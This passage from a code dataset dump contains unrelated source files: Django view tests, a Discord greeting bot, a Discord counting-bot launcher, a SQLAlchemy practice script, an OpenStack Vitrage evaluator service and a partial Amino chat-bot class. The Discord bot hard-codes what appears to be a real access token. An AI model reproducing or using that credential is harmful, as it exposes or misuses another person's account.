Genre, Screenshot, FavoriteGame\nfrom gameMuster.views import get_game_genres, get_page_obj\n\nITEMS_ON_PAGE = 4\n\n\nclass GamesIndexViewTestCase(BaseTest):\n \"\"\"Index view tests\"\"\"\n\n def test_get_page_obj(self):\n request = self.factory.get(reverse(\"index\"))\n response = self.client.get(reverse(\"index\"))\n page_obj = get_page_obj(request, ITEMS_ON_PAGE, [self.game])\n\n self.assertCountEqual(\n page_obj.object_list, response.context[\"page_obj\"].object_list\n )\n\n def test_index_get(self):\n \"\"\"Index view test\"\"\"\n response = self.client.get(reverse(\"index\"))\n\n self.assertEquals(response.status_code, 200)\n self.assertTemplateUsed(response, \"gameMuster/index.html\")\n\n def test_no_filters_selected(self):\n \"\"\"If no filters are selected by user\"\"\"\n response = self.client.get(reverse(\"index\"))\n\n self.assertCountEqual(response.context[\"game_list\"], [self.game])\n self.assertDictEqual(\n response.context[\"game_genres\"], get_game_genres([self.game])\n )\n self.assertCountEqual(response.context[\"platforms\"], Platform.objects.all())\n self.assertCountEqual(response.context[\"genres\"], Genre.objects.all())\n self.assertEqual(response.context[\"platforms_chosen\"], None)\n self.assertEqual(response.context[\"genres_chosen\"], None)\n self.assertEqual(response.context[\"rating\"], 50)\n\n def test_filters_selected(self):\n \"\"\"If filters are selected by user\"\"\"\n response = self.client.get(\n reverse(\"index\"),\n {\"platforms\": [self.platform.id], \"genres\": [self.genre.id], \"rating\": 0},\n )\n\n self.assertCountEqual(response.context[\"game_list\"], [self.game])\n self.assertDictEqual(\n response.context[\"game_genres\"], get_game_genres([self.game])\n )\n self.assertCountEqual(response.context[\"platforms\"], Platform.objects.all())\n self.assertCountEqual(response.context[\"genres\"], Genre.objects.all())\n self.assertCountEqual(response.context[\"platforms_chosen\"], [self.platform.id])\n self.assertCountEqual(response.context[\"genres_chosen\"], [self.genre.id])\n self.assertEqual(response.context[\"rating\"], 0)\n\n\nclass GamesDetailViewTestCase(BaseTest):\n \"\"\"Detail view tests\"\"\"\n\n @requests_mock.Mocker()\n def test_detail_get(self, mock):\n \"\"\"If game exists\"\"\"\n mock.get(\n \"https://api.twitter.com/1.1/search/tweets.json\",\n json={\n \"statuses\": {\n \"created_at\": \"Fri Jun 11 12:45:10 +0000 2021\",\n \"user\": {\"name\": self.faker.name()},\n \"full_text\": self.faker.pystr(max_chars=10),\n }\n },\n )\n url = reverse(\"detail\", args=(self.game.game_id,))\n response = self.client.get(url)\n\n self.assertEquals(response.status_code, 200)\n self.assertEqual(self.game, response.context[\"game\"])\n self.assertEqual(self.game.name.replace(\" \", \"\"), response.context[\"game_name\"])\n self.assertCountEqual(\n list(Genre.objects.filter(game=self.game)), response.context[\"genres\"]\n )\n self.assertCountEqual(\n list(Platform.objects.filter(game=self.game)), response.context[\"platforms\"]\n )\n self.assertCountEqual(\n list(Screenshot.objects.filter(game=self.game)),\n response.context[\"screenshots\"],\n )\n\n def test_game_does_not_exit(self):\n \"\"\"If game does not exist\"\"\"\n url = reverse(\"detail\", args=(self.game.id + 1,))\n self.client.get(url)\n\n self.assertRaises(LookupError)\n\n\nclass FavoriteGamesViewTestCase(BaseTest):\n \"\"\"Favorite games view tests\"\"\"\n\n def setUp(self):\n super().setUp()\n self.login_user()\n\n def add_game_to_favorite(self):\n return FavoriteGame.objects.create(game=self.game, user=self.user)\n\n def test_favorite_authenticated(self):\n \"\"\"Favorite main page test if user is authenticated\"\"\"\n favorite_game = self.add_game_to_favorite()\n response = self.client.get(reverse(\"favorite\"))\n\n self.assertEqual(response.status_code, 200)\n self.assertCountEqual([favorite_game.game], response.context[\"game_list\"])\n self.assertCountEqual(\n [favorite_game.game.game_id], response.context[\"favorite_game_list\"]\n )\n\n def test_favorite_not_authenticated(self):\n \"\"\"Favorite main page test if user is not authenticated\"\"\"\n self.client.logout()\n response = self.client.get(reverse(\"favorite\"))\n\n self.assertEqual(response.status_code, 302)\n","sub_path":"gameMuster/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":4841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"520193851","text":"# インストールした discord.py を読み込む\r\nimport discord\r\n\r\n# 自分のBotのアクセストークンに置き換えてください\r\nTOKEN = 'NzEzMzM5OTAwMjgzMzIyNDU4.Xsj5Ug.fzF-rDMAmDe-dH6R29394CDA65Q'\r\n\r\n# 接続に必要なオブジェクトを生成\r\nclient = discord.Client()\r\n\r\nCHANNEL_ID =711234511710715924\r\n\r\n# 起動時に動作する処理\r\n@client.event\r\nasync def on_ready():\r\n # 起動したらターミナルにログイン通知が表示される\r\n print('ログインしただなも')\r\n\r\n# メッセージ受信時に動作する処理\r\n@client.event\r\nasync def on_message(message):\r\n # メッセージ送信者がBotだった場合は無視する\r\n if message.author.bot:\r\n return\r\n # 「/neko」と発言したら「にゃーん」が返る処理\r\n if message.content == 'たぬきち':\r\n await message.channel.send('テスト中だなも~')\r\n\t\t\r\n# Botの起動とDiscordサーバーへの接続\r\nclient.run(TOKEN)","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"147803054","text":"import argparse\nimport os\n\nfrom dotenv import load_dotenv\n\nfrom TheCount import TheCount\nfrom InputParser import InputParser\n\n\ndef main():\n load_dotenv()\n TOKEN = os.getenv('DISCORD_TOKEN')\n\n assert (TOKEN is not None)\n parser = argparse.ArgumentParser(\n description=\n \"\"\"\n The Count\n A Discord bot that allows you to count! AH AH AH!\n \"\"\",\n formatter_class=argparse.RawDescriptionHelpFormatter)\n\n parser.add_argument(\"--send-opening-message\", type=InputParser.string_to_boolean, nargs='?',\n const=True, default=True,\n help=\"Whether or not The Count should open with a greeting\")\n parser.add_argument(\"--channel\", default=\"counting\",\n help=\"The channel The Count will operate in\"),\n parser.add_argument(\"--prefix\", default=\"!\",\n help=\"The prefix that goes before each command\"),\n parser.add_argument(\"--save-interval\", default=10, type=InputParser.string_to_int,\n help=\"The Count will save its progress after n messages\")\n\n args = parser.parse_args()\n\n bot = TheCount(\n send_opening_message=args.send_opening_message,\n target_channel_name=args.channel,\n save_interval=args.save_interval,\n prefix=args.prefix\n )\n\n bot.start(TOKEN)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"620680880","text":"import sqlalchemy\nfrom sqlalchemy import create_engine\nfrom sqlalchemy import Table, Column, Integer, String, MetaData, ForeignKey\nfrom sqlalchemy.sql import select\nfrom sqlalchemy.sql import and_, or_, not_\nfrom sqlalchemy.sql import text\nfrom sqlalchemy import func, desc\n\nprint(sqlalchemy.__version__)\nengine = create_engine('sqlite:///:memory:', echo=True)\nmetadata = MetaData()\n\nusers = Table('users', metadata,\n Column('id', Integer, primary_key=True),\n Column('name', String(50)),\n Column('fullname', String(50)),\n )\n\naddresses = Table('addresses', metadata,\n Column('id', Integer, primary_key=True),\n Column('user_id', None, ForeignKey('users.id')),\n Column('email_address', String, nullable=False)\n )\n\nmetadata.create_all(engine)\nconn = engine.connect()\n\nins = users.insert()\nconn.execute(ins, name='jack', fullname='Jack Jones')\nconn.execute(ins, id=2, name='wendy', fullname='Wendy Williams')\n\nconn.execute(addresses.insert(), [\n {'user_id': 1, 'email_address' : 'jack@yahoo.com'},\n {'user_id': 1, 'email_address' : 'jack@msn.com'},\n {'user_id': 2, 'email_address' : 'www@www.org'},\n {'user_id': 2, 'email_address' : 'wendy@aol.com'},\n ])\n\n'''\n\ns = select([users])\n\nresult = conn.execute(s)\nfor row in result:\n print(row)\n\nresult = conn.execute(s)\nrow = result.fetchone()\nprint(\"name:\", row['name'], \"; fullname:\", row['fullname'])\nprint(\"name:\", row[1], \"; fullname:\", row[2])\n\nfor row in conn.execute(s):\n print(\"name:\", row[users.c.name], \"; fullname:\", row[users.c.fullname])\n\ns = select([users.c.name, users.c.fullname])\n\nresult = conn.execute(s)\nfor row in result:\n print (row)\n\nfor row in conn.execute(select([users, addresses]).where(users.c.id == addresses.c.user_id)):\n print (row)\n\nprint(and_(\n users.c.name.like('j%'), users.c.id == addresses.c.user_id, \\\n or_(\n addresses.c.email_address == 'wendy@aol.com',\n addresses.c.email_address == 'jack@yahoo.com'\n ), \\\n not_(users.c.id > 5)))\n\ns = select([(users.c.fullname +\n \", \" + addresses.c.email_address).\n label('title')]).\\\n where(\n and_(\n users.c.id == addresses.c.user_id,\n users.c.name.between('m', 'z'),\n or_(\n addresses.c.email_address.like('%@aol.com'),\n addresses.c.email_address.like('%@msn.com')\n )\n )\n )\nresult = conn.execute(s)\nfor row in result:\n print (row)\n\ns = text(\n \"SELECT users.fullname || ', ' || addresses.email_address AS title \"\n \"FROM users, addresses \"\n \"WHERE users.id = addresses.user_id \"\n \"AND users.name BETWEEN :x AND :y \"\n \"AND (addresses.email_address LIKE :e1 \"\n \"OR addresses.email_address LIKE :e2)\")\n\nresult = conn.execute(s, x='m', y='z', e1='%@aol.com', e2='%@msn.com')\n\nfor row in result:\n print (row)\n\nstmt = select([\n addresses.c.user_id,\n func.count(addresses.c.id).label('num_addresses')]).\\\n order_by(desc(\"num_addresses\"))\n\nresult = conn.execute(stmt)\nfor row in result:\n print (row)\n\nprint (users.join(addresses))\n\nprint(users.join(addresses))\n\nprint(users.join(addresses,\n addresses.c.email_address.like(users.c.name + '%')\n ))\n\ns = select([users.c.fullname]).select_from(\n users.join(addresses,\n addresses.c.email_address.like(users.c.name + '%'))\n )\nresult = conn.execute(s)\nfor row in result:\n print(row)\n\ns = select([users.c.fullname]).select_from(users.outerjoin(addresses))\nresult = conn.execute(s)\nfor row in result:\n print(row)\n\nstmt = select([users.c.name]).order_by(users.c.name)\nresult = conn.execute(stmt)\nfor row in result:\n print(row)\n\nstmt = select([users.c.name]).order_by(users.c.name.desc())\nresult = conn.execute(stmt)\nfor row in result:\n print(row)\n\nstmt = select([users.c.name, func.count(addresses.c.id)]).\\\n select_from(users.join(addresses)).\\\n group_by(users.c.name)\nresult = conn.execute(stmt)\nfor row in result:\n print(row)\n\n'''\n\nstmt = users.update().\\\n values(fullname=\"Fullname: \" + users.c.name)\nresult = conn.execute(stmt)\n\nconn.execute(users.delete().where(users.c.name > 'm'))\n\n# result.close()\n","sub_path":"sqlalchemy-playground/sqlalchemy-playground.py","file_name":"sqlalchemy-playground.py","file_ext":"py","file_size_in_byte":4317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"286747628","text":"#!/usr/bin/python3\n\"\"\"This module prints first name and last name.\n\nThis module has one function say_my_name.\n\"\"\"\n\n\ndef say_my_name(first_name, last_name=\"\"):\n \"\"\"Function say my name.\n\n This function check the right first and last name\n and prints:\n\n Args:\n first_name (str): The first parameter has to be string.\n last_name (str): The second parameter has to be string-\n\n Returns:\n not return\n\n \"\"\"\n if (type(first_name) != str or first_name is None):\n raise TypeError(\"first_name must be a string\")\n elif (type(last_name) != str or last_name is None):\n raise TypeError(\"last_name must be a string\")\n else:\n print(\"My name is {:s} {:s}\".format(first_name, last_name))\n","sub_path":"0x07-python-test_driven_development/3-say_my_name.py","file_name":"3-say_my_name.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"435766422","text":"# Copyright 2017 - Nokia\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport multiprocessing\nimport time\n\nfrom oslo_concurrency import processutils\nfrom oslo_log import log\nfrom oslo_service import service as os_service\n\nfrom vitrage.entity_graph import EVALUATOR_TOPIC\nfrom vitrage.evaluator.evaluator_base import EvaluatorBase\n\nfrom vitrage.evaluator.scenario_evaluator import ScenarioEvaluator\nfrom vitrage.evaluator.scenario_repository import ScenarioRepository\nfrom vitrage.messaging import VitrageNotifier\n\nLOG = log.getLogger(__name__)\n\n\nSTART_EVALUATION = 'start_evaluation'\nPOISON_PILL = None\n\n\nclass EvaluatorManager(EvaluatorBase):\n\n def __init__(self, conf, entity_graph):\n super(EvaluatorManager, self).__init__(conf, entity_graph)\n self._workers_num = conf.evaluator.workers or \\\n processutils.get_worker_count()\n self._worker_queues = list()\n self._p_launcher = os_service.ProcessLauncher(conf)\n\n def run_evaluator(self):\n LOG.info('Starting %s Evaluator Processes', str(self._workers_num))\n for i in range(self._workers_num):\n self._add_worker(enabled=False)\n self._notify_all(None, None, None, evaluator_action=START_EVALUATION)\n self._entity_graph.subscribe(self._notify_all)\n\n def _add_worker(self, enabled=False):\n \"\"\"Create an EvaluatorWorker and it's task queue\n\n The new worker is initialized with a scenario repository\n that only contains a portion of the templates\n \"\"\"\n scenario_repo = ScenarioRepository(\n self._conf,\n len(self._worker_queues),\n self._workers_num)\n tasks_queue = multiprocessing.JoinableQueue()\n w = EvaluatorWorker(\n self._conf,\n tasks_queue,\n self._entity_graph,\n scenario_repo,\n enabled)\n self._p_launcher.launch_service(w)\n self._worker_queues.append(tasks_queue)\n\n def _notify_all(self, before, current, is_vertex, *args, **kwargs):\n \"\"\"Notify all workers\n\n This method is subscribed to entity graph changes.\n Per each change in the main entity graph, this method will notify\n each of the evaluators, causing them to update their own graph.\n \"\"\"\n evaluator_action = kwargs.get('evaluator_action', None)\n self._notify_and_wait((before, current, is_vertex, evaluator_action))\n\n def _notify_and_wait(self, payload):\n for q in self._worker_queues:\n q.put(payload)\n time.sleep(0) # context switch before join\n for q in self._worker_queues:\n q.join()\n\n def stop_all_workers(self):\n self._notify_and_wait(POISON_PILL)\n for q in self._worker_queues:\n q.close()\n self._worker_queues = list()\n\n def reload_all_workers(self, enabled=True):\n self.stop_all_workers()\n for i in range(self._workers_num):\n self._add_worker(enabled=enabled)\n\n\nclass EvaluatorWorker(os_service.Service):\n def __init__(self,\n conf,\n task_queue,\n entity_graph,\n scenario_repo,\n enabled=False):\n super(EvaluatorWorker, self).__init__()\n self._conf = conf\n self._task_queue = task_queue\n self._entity_graph = entity_graph\n self._scenario_repo = scenario_repo\n self._enabled = enabled\n self._evaluator = None\n\n def start(self):\n super(EvaluatorWorker, self).start()\n actions_callback = VitrageNotifier(\n conf=self._conf,\n publisher_id='vitrage_evaluator',\n topic=EVALUATOR_TOPIC).notify\n self._entity_graph.notifier._subscriptions = [] # Quick n dirty\n self._evaluator = ScenarioEvaluator(\n self._conf,\n self._entity_graph,\n self._scenario_repo,\n actions_callback,\n self._enabled)\n self.tg.add_thread(self._read_queue)\n LOG.info(\"EvaluatorWorkerService - Started!\")\n self._evaluator.scenario_repo.log_enabled_scenarios()\n\n def _read_queue(self):\n while True:\n next_task = self._task_queue.get()\n if next_task is POISON_PILL:\n self._task_queue.task_done()\n break\n try:\n self._do_task(next_task)\n except Exception as e:\n LOG.exception(\"Graph may not be in sync: exception %s\", e)\n self._task_queue.task_done()\n # Evaluator queue may have been updated, thus the sleep:\n time.sleep(0)\n\n def _do_task(self, task):\n (before, current, is_vertex, action) = task\n if not action:\n self._graph_update(before, current, is_vertex)\n elif action == START_EVALUATION:\n self._evaluator.run_evaluator()\n\n def _graph_update(self, before, current, is_vertex):\n if current:\n if is_vertex:\n self._entity_graph.add_vertex(current)\n else:\n self._entity_graph.add_edge(current)\n else:\n if is_vertex:\n self._entity_graph.delete_vertex(before)\n else:\n self._entity_graph.delete_edge(before)\n\n def stop(self, graceful=False):\n super(EvaluatorWorker, self).stop(graceful)\n self.tg.stop()\n LOG.info(\"EvaluatorWorkerService - Stopped!\")\n","sub_path":"vitrage/evaluator/evaluator_service.py","file_name":"evaluator_service.py","file_ext":"py","file_size_in_byte":5946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"228080233","text":"import os\nimport sys\nimport duckduckpy\nimport time\nfrom datetime import date\nimport text2pdf\nimport threading\nimport bs4\nimport requests\nimport urllib.request\nimport json\nimport random\nfrom random import uniform\nfrom pprint import pprint\nfrom gtts import gTTS, lang\nfrom youtube_search import YoutubeSearch\nfrom google_trans_new import google_translator\nfrom json import dumps, load\nfrom time import sleep\nfrom io import BytesIO\nfrom string import hexdigits\nfrom string import punctuation\nfrom random import choice, randint, sample\nfrom pathlib import Path\nfrom threading import Thread\nfrom contextlib import suppress\nfrom unicodedata import normalize\n\nfrom pdf2image import convert_from_path\nfrom youtube_dl import YoutubeDL\nfrom amino.client import Client\nfrom amino.sub_client import SubClient\n\n# Big optimisation thanks to SempreLEGIT#1378 ♥\nversion = \"1.6.3\"\nprint(f\"version : {version}\")\n\npath_utilities = \"utilities\"\npath_amino = 'utilities/amino_list'\npath_picture = 'utilities/pictures'\npath_sound = 'utilities/sound'\npath_download = 'utilities/download'\npath_config = \"utilities/config.json\"\npath_client = \"client.txt\"\n\nfor i in (path_utilities, path_picture, path_sound, path_download, path_amino):\n\tPath(i).mkdir(exist_ok=True)\n\n\nclass BotAmino:\n\tdef __init__(self, client, community, inv: str = None):\n\t\tself.client = client\n\t\tself.lvl_min = 0\n\t\tself.marche = True\n\n\t\tif isinstance(community, int):\n\t\t\tself.community_id = community\n\t\t\tself.community = self.client.get_community_info(\n\t\t\t comId=self.community_id)\n\t\t\tself.community_amino_id = self.community.aminoId\n\t\telse:\n\t\t\tself.community_amino_id = community\n\t\t\tself.informations = self.client.get_from_code(\n\t\t\t f\"http://aminoapps.com/c/{community}\")\n\t\t\tself.community_id = self.informations.json[\"extensions\"][\n\t\t\t \"community\"][\"ndcId\"]\n\t\t\tself.community = self.client.get_community_info(\n\t\t\t comId=self.community_id)\n\n\t\tself.community_name = self.community.name\n\t\ttry:\n\t\t\tself.community_leader_agent_id = self.community.json[\"agent\"][\n\t\t\t \"uid\"]\n\t\texcept Exception:\n\t\t\tself.community_leader_agent_id = \"\"\n\n\t\ttry:\n\t\t\tself.community_staff_list = self.community.json[\n\t\t\t \"communityHeadList\"]\n\t\texcept Exception:\n\t\t\tself.community_staff_list = \"\"\n\n\t\tif self.community_staff_list:\n\t\t\tself.community_leaders = [\n\t\t\t elem[\"uid\"] for elem in self.community_staff_list\n\t\t\t if elem[\"role\"] in (100, 102)\n\t\t\t]\n\t\t\tself.community_curators = [\n\t\t\t elem[\"uid\"] for elem in self.community_staff_list\n\t\t\t if elem[\"role\"] == 101\n\t\t\t]\n\t\t\tself.community_staff = [\n\t\t\t elem[\"uid\"] for elem in self.community_staff_list\n\t\t\t]\n\n\t\tif not Path(f'{path_amino}/{self.community_amino_id}.json').exists():\n\t\t\tself.create_community_file()\n\n\t\told_dict = self.get_file_dict()\n\t\tnew_dict = self.create_dict()\n\n\t\tfor key, value in new_dict.items():\n\t\t\tif key not in old_dict:\n\t\t\t\told_dict[key] = value\n\n\t\tfor key, value in old_dict.items():\n\t\t\tif key not in new_dict:\n\t\t\t\tdel old_dict[key]\n\n\t\tself.update_file(old_dict)\n\n\t\tself.subclient = SubClient(comId=self.community_id,\n\t\t profile=client.profile)\n\t\tself.banned_words = self.get_file_info(\"banned_words\")\n\t\tself.message_bvn = self.get_file_info(\"welcome\")\n\t\tself.locked_command = self.get_file_info(\"locked_command\")\n\t\tself.admin_locked_command = self.get_file_info(\"admin_locked_command\")\n\t\tself.welcome_chat = self.get_file_info(\"welcome_chat\")\n\t\tself.only_view = self.get_file_info(\"only_view\")\n\t\tself.prefix = self.get_file_info(\"prefix\")\n\t\tself.level = self.get_file_info(\"level\")\n\t\tself.favorite_users = self.get_file_info(\"favorite_users\")\n\t\tself.favorite_chats = self.get_file_info(\"favorite_chats\")\n\t\tself.subclient.activity_status(\"on\")\n\t\tnew_users = self.subclient.get_all_users(start=0,\n\t\t size=30,\n\t\t type=\"recent\")\n\t\tself.new_users = [\n\t\t elem[\"uid\"] for elem in new_users.json[\"userProfileList\"]\n\t\t]\n\t\tif self.welcome_chat or self.message_bvn:\n\t\t\twith suppress(Exception):\n\t\t\t\tThread(target=self.check_new_member).start()\n\n\tdef create_community_file(self):\n\t\twith open(f'{path_amino}/{self.community_amino_id}.json',\n\t\t 'w',\n\t\t encoding='utf8') as file:\n\t\t\tdict = self.create_dict()\n\t\t\tfile.write(dumps(dict, sort_keys=False, indent=4))\n\n\tdef create_dict(self):\n\t\treturn {\n\t\t \"welcome\": \"\",\n\t\t \"banned_words\": [],\n\t\t \"locked_command\": [],\n\t\t \"admin_locked_command\": [],\n\t\t \"prefix\": \"/\",\n\t\t \"only_view\": [],\n\t\t \"welcome_chat\": \"\",\n\t\t \"level\": 6,\n\t\t \"favorite_users\": [],\n\t\t \"favorite_chats\": []\n\t\t}\n\n\tdef get_dict(self):\n\t\treturn {\n\t\t \"welcome\": self.message_bvn,\n\t\t \"banned_words\": self.banned_words,\n\t\t \"locked_command\": self.locked_command,\n\t\t \"admin_locked_command\": self.admin_locked_command,\n\t\t \"prefix\": self.prefix,\n\t\t \"only_view\": self.only_view,\n\t\t \"welcome_chat\": self.welcome_chat,\n\t\t \"level\": self.level,\n\t\t \"favorite_users\": self.favorite_users,\n\t\t \"favorite_chats\": self.favorite_chats\n\t\t}\n\n\tdef update_file(self, dict=None):\n\t\tif not dict:\n\t\t\tdict = self.get_dict()\n\t\twith open(f\"{path_amino}/{self.community_amino_id}.json\",\n\t\t \"w\",\n\t\t encoding=\"utf8\") as file:\n\t\t\tfile.write(dumps(dict, sort_keys=False, indent=4))\n\n\tdef get_file_info(self, info: str = None):\n\t\twith open(f\"{path_amino}/{self.community_amino_id}.json\",\n\t\t \"r\",\n\t\t encoding=\"utf8\") as file:\n\t\t\treturn load(file)[info]\n\n\tdef get_file_dict(self, info: str = None):\n\t\twith open(f\"{path_amino}/{self.community_amino_id}.json\",\n\t\t \"r\",\n\t\t encoding=\"utf8\") as file:\n\t\t\treturn load(file)\n\n\tdef set_prefix(self, prefix: str):\n\t\tself.prefix = prefix\n\t\tself.update_file()\n\n\tdef set_level(self, level: int):\n\t\tself.level = level\n\t\tself.update_file()\n\n\tdef set_welcome_message(self, message: str):\n\t\tself.message_bvn = message.replace('\"', '“')\n\t\tself.update_file()\n\n\tdef set_welcome_chat(self, chatId: str):\n\t\tself.welcome_chat = chatId\n\t\tself.update_file()\n\n\tdef add_locked_command(self, liste: list):\n\t\tself.locked_command.extend(liste)\n\t\tself.update_file()\n\n\tdef add_admin_locked_command(self, liste: list):\n\t\tself.admin_locked_command.extend(liste)\n\t\tself.update_file()\n\n\tdef add_banned_words(self, liste: list):\n\t\tself.banned_words.extend(liste)\n\t\tself.update_file()\n\n\tdef add_only_view(self, chatId: str):\n\t\tself.only_view.append(chatId)\n\t\tself.update_file()\n\n\tdef add_favorite_users(self, value: str):\n\t\tself.favorite_users.append(value)\n\t\tself.update_file()\n\n\tdef add_favorite_chats(self, value: str):\n\t\tself.favorite_chats.append(value)\n\t\tself.update_file()\n\n\tdef remove_locked_command(self, liste: list):\n\t\t[\n\t\t self.locked_command.remove(elem) for elem in liste\n\t\t if elem in self.locked_command\n\t\t]\n\t\tself.update_file()\n\n\tdef remove_admin_locked_command(self, liste: list):\n\t\t[\n\t\t self.admin_locked_command.remove(elem) for elem in liste\n\t\t if elem in self.admin_locked_command\n\t\t]\n\t\tself.update_file()\n\n\tdef remove_banned_words(self, liste: list):\n\t\t[\n\t\t self.banned_words.remove(elem) for elem in liste\n\t\t if elem in self.banned_words\n\t\t]\n\t\tself.update_file()\n\n\tdef remove_favorite_users(self, value: str):\n\t\tliste = [value]\n\t\t[\n\t\t self.favorite_users.remove(elem) for elem in liste\n\t\t if elem in self.favorite_users\n\t\t]\n\t\tself.update_file()\n\n\tdef remove_favorite_chats(self, value: str):\n\t\tliste = [value]\n\t\t[\n\t\t self.favorite_chats.remove(elem) for elem in liste\n\t\t if elem in self.favorite_chats\n\t\t]\n\t\tself.update_file()\n\n\tdef remove_only_view(self, chatId: str):\n\t\tself.only_view.remove(chatId)\n\t\tself.update_file()\n\n\tdef unset_welcome_chat(self):\n\t\tself.welcome_chat = \"\"\n\t\tself.update_file()\n\n\tdef is_in_staff(self, uid):\n\t\treturn uid in self.community_staff\n\n\tdef is_leader(self, uid):\n\t\treturn uid in self.community_leaders\n\n\tdef is_curator(self, uid):\n\t\treturn uid in self.community_curators\n\n\tdef is_agent(self, uid):\n\t\treturn uid == self.community_leader_agent_id\n\n\tdef accept_role(self, rid: str = None, cid: str = None):\n\t\twith suppress(Exception):\n\t\t\tself.subclient.accept_organizer(cid)\n\t\t\treturn True\n\t\twith suppress(Exception):\n\t\t\tself.subclient.promotion(noticeId=rid)\n\t\t\treturn True\n\t\treturn False\n\n\tdef get_staff(self, community):\n\t\tif isinstance(community, int):\n\t\t\twith suppress(Exception):\n\t\t\t\tcommunity = self.client.get_community_info(com_id=community)\n\t\telse:\n\t\t\ttry:\n\t\t\t\tinformations = self.client.get_from_code(\n\t\t\t\t f\"http://aminoapps.com/c/{community}\")\n\t\t\texcept Exception:\n\t\t\t\treturn False\n\n\t\t\tcommunity_id = informations.json[\"extensions\"][\"community\"][\n\t\t\t \"ndcId\"]\n\t\t\tcommunity = self.client.get_community_info(comId=community_id)\n\n\t\ttry:\n\t\t\tcommunity_staff_list = community.json[\"communityHeadList\"]\n\t\t\tcommunity_staff = [elem[\"uid\"] for elem in community_staff_list]\n\t\texcept Exception:\n\t\t\tcommunity_staff_list = \"\"\n\t\telse:\n\t\t\treturn community_staff\n\n\tdef get_user_id(self, user_name):\n\t\tsize = self.subclient.get_all_users(\n\t\t start=0, size=1, type=\"recent\").json['userProfileCount']\n\t\tsize2 = size\n\n\t\tst = 0\n\t\twhile size > 0:\n\t\t\tvalue = size\n\t\t\tif value > 100:\n\t\t\t\tvalue = 100\n\n\t\t\tusers = self.subclient.get_all_users(start=st, size=value)\n\t\t\tfor user in users.json['userProfileList']:\n\t\t\t\tif user_name == user['nickname'] or user_name == user['uid']:\n\t\t\t\t\treturn (user[\"nickname\"], user['uid'])\n\t\t\tsize -= 100\n\t\t\tst += 100\n\n\t\tsize = size2\n\n\t\tst = 0\n\t\twhile size > 0:\n\t\t\tvalue = size\n\t\t\tif value > 100:\n\t\t\t\tvalue = 100\n\n\t\t\tusers = self.subclient.get_all_users(start=st, size=value)\n\t\t\tfor user in users.json['userProfileList']:\n\t\t\t\tif user_name.lower() in user['nickname'].lower():\n\t\t\t\t\treturn (user[\"nickname\"], user['uid'])\n\t\t\tsize -= 100\n\t\t\tst += 100\n\n\t\treturn False\n\n\tdef ask_all_members(self, message, lvl: int = 20, type_bool: int = 1):\n\t\tsize = self.subclient.get_all_users(\n\t\t start=0, size=1, type=\"recent\").json['userProfileCount']\n\t\tst = 0\n\n\t\twhile size > 0:\n\t\t\tvalue = size\n\t\t\tif value > 100:\n\t\t\t\tvalue = 100\n\t\t\tusers = self.subclient.get_all_users(start=st, size=value)\n\t\t\tif type_bool == 1:\n\t\t\t\tuser_lvl_list = [\n\t\t\t\t user['uid'] for user in users.json['userProfileList']\n\t\t\t\t if user['level'] == lvl\n\t\t\t\t]\n\t\t\telif type_bool == 2:\n\t\t\t\tuser_lvl_list = [\n\t\t\t\t user['uid'] for user in users.json['userProfileList']\n\t\t\t\t if user['level'] <= lvl\n\t\t\t\t]\n\t\t\telif type_bool == 3:\n\t\t\t\tuser_lvl_list = [\n\t\t\t\t user['uid'] for user in users.json['userProfileList']\n\t\t\t\t if user['level'] >= lvl\n\t\t\t\t]\n\t\t\tself.subclient.start_chat(userId=user_lvl_list, message=message)\n\t\t\tsize -= 100\n\t\t\tst += 100\n\n\tdef ask_amino_staff(self, message):\n\t\tself.subclient.start_chat(userId=self.community_staff, message=message)\n\n\tdef get_chat_id(self, chat: str = None):\n\t\twith suppress(Exception):\n\t\t\treturn self.subclient.get_from_code(\n\t\t\t f\"http://aminoapps.com/c/{chat}\").objectId\n\n\t\tval = self.subclient.get_public_chat_threads(size=50)\n\t\tfor title, chat_id in zip(val.title, val.chatId):\n\t\t\tif chat == title:\n\t\t\t\treturn chat_id\n\t\tfor title, chat_id in zip(val.title, val.chatId):\n\t\t\tif chat.lower() in title.lower() or chat == chat_id:\n\t\t\t\treturn chat_id\n\t\treturn False\n\n\tdef stop_instance(self):\n\t\tself.marche = False\n\n\tdef leave_community(self):\n\t\tself.client.leave_community(comId=self.community_id)\n\t\tself.marche = False\n\t\tfor elem in self.subclient.get_public_chat_threads().chatId:\n\t\t\twith suppress(Exception):\n\t\t\t\tself.subclient.leave_chat(elem)\n\n\tdef check_new_member(self):\n\t\tif not (self.message_bvn and self.welcome_chat):\n\t\t\treturn\n\t\tnew_list = self.subclient.get_all_users(start=0,\n\t\t size=25,\n\t\t type=\"recent\")\n\t\tnew_member = [(elem[\"nickname\"], elem[\"uid\"])\n\t\t for elem in new_list.json[\"userProfileList\"]]\n\t\tfor elem in new_member:\n\t\t\tname, uid = elem[0], elem[1]\n\t\t\ttry:\n\t\t\t\tval = self.subclient.get_wall_comments(\n\t\t\t\t userId=uid, sorting='newest').commentId\n\t\t\texcept Exception:\n\t\t\t\tval = True\n\n\t\t\tif not val and self.message_bvn:\n\t\t\t\twith suppress(Exception):\n\t\t\t\t\tself.subclient.comment(message=self.message_bvn,\n\t\t\t\t\t userId=uid)\n\t\t\tif not val and self.welcome_chat:\n\t\t\t\twith 